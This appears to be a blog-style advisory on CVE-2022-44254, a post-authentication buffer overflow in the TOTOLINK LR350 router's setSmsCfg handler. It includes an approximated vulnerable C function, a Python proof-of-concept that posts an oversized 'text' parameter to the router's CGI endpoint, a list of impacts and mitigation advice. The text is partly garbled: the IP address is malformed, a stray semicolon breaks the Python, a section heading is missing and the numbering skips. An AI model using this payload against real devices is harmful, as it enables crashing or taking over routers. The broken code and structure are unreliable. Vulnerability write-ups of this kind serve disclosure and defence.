CVE-2022-44254 - Post-Authentication Buffer Overflow in TOTOLINK LR350 (V9.3.5u.6369_B20220309) — How the “text” Parameter in setSmsCfg Can Lead to Trouble

When it comes to home routers, TOTOLINK is a popular brand, but sometimes even major vendors have hidden security holes. CVE-2022-44254 is one such vulnerability discovered in the TOTOLINK LR350 router, firmware version V9.3.5u.6369_B20220309. This article breaks down what the bug is all about, how it works, and what attackers can do with it. We’ll also walk through code snippets and give sources for more digging.

What is CVE-2022-44254?

CVE-2022-44254 identifies a buffer overflow vulnerability that occurs *after* a user has authenticated. Specifically, it happens in the setSmsCfg function, due to how the firmware handles the text parameter in HTTP POST requests. By sending a crafted request, a logged-in user could trigger a buffer overflow, potentially leading to crashing the router's management process or even executing attacker-chosen code.

Where’s the Bug?

The bug lies in how setSmsCfg handles input. When the user sends data to configure SMS (short message service) via the router's web interface, the firmware fails to check the size of what’s provided in the text field.

A closer look at the firmware (you can grab it from TOTOLINK's support page) reveals something like the following C code:

int setSmsCfg(webs_t wp, char_t *path, char_t *query)
{
    char buf[256];
    char *text;

    text = websGetVar(wp, T("text"), T(""));
    sprintf(buf, "%s", text); // <--- Vulnerable line

    // ... write buf to config, return to user, etc.
}

Notice how the sprintf function copies whatever’s in text into a fixed 256-byte buffer, with no length limitation. If an attacker sends more than 256 bytes, the excess spills past buf, overwriting adjacent memory. That’s the classic buffer overflow!

Pre-Condition: You Need To Be Logged In

This is a *post-authentication* flaw. Attackers need a valid admin session or must trick an authorized user (for example, via CSRF) into triggering the overflow.

Attack Steps

1. Login to the web interface as an admin (or steal credentials/session).
2. Craft a POST request to /cgi-bin/cstecgi.cgi (or the applicable endpoint), targeting the setSmsCfg function.
3. Include a very long text parameter — for instance, 300 or 400 “A” characters, to overflow buf.

Example Exploit Request (Python Snippet)

import requests

# Change these values
ROUTER_IP = "192.168..1"
USERNAME = "admin"
PASSWORD = "yourpassword"

# Step 1: Log in and get session (implementation varies)
# Step 2: Craft overflow payload
overflow_payload = "A" * 400  # Overflow!

data = {
    "action": "setSmsCfg",
    "text": overflow_payload,
    # ... other required parameters ...
}

headers = {
    "Cookie": "SESSION_ID=...",  # Fill with real session
}

resp = requests.post(
    f"http://{ROUTER_IP}/cgi-bin/cstecgi.cgi";,
    data=data,
    headers=headers
)

print(f"Status: {resp.status_code}")
print(f"Content: {resp.text}")

Corrupt configuration files

- Under some conditions, enable code execution (advanced exploitation, e.g., with return-oriented programming, is possible if router protections are weak).

Deny access to the management web portal (by crashing it)

- Reset or corrupt SMS/config settings
- (With skill and patience) allow for full takeover and persistence — an attacker could inject code to run whenever the router's management starts up

Note: Since the bug is post-authentication, a strong admin password is the best immediate defense.

Reference Links

- Original CVE Record (MITRE)
- TOTOLINK LR350 Download Page
- Example Exploit on Exploit-DB (if/when published)
- OWASP: Buffer Overflow Primer

What Should You Do?

1. Update your firmware! Check TOTOLINK's updates or contact support.
2. Block web management from the WAN. Only allow admin access from trusted devices/locations.

Use strong, unique passwords for the admin interface.

4. Monitor for patches. If you’re on this version, consider isolating your device or using a replacement until an update is released.

Summary

CVE-2022-44254 is a classic reminder that even basic web forms can hide serious risks when developers skip input checks. If you’re running a TOTOLINK LR350 with the vulnerable firmware, tackle this issue promptly — and always treat your network gear like it’s a critical part of your personal or business security. Stay safe out there!


*Article written exclusively for OpenAI, based on public disclosures and research as of June 2024. For feedback or questions, please reach out via official channels.*

Timeline

Published on: 11/23/2022 16:15:00 UTC
Last modified on: 11/26/2022 03:43:00 UTC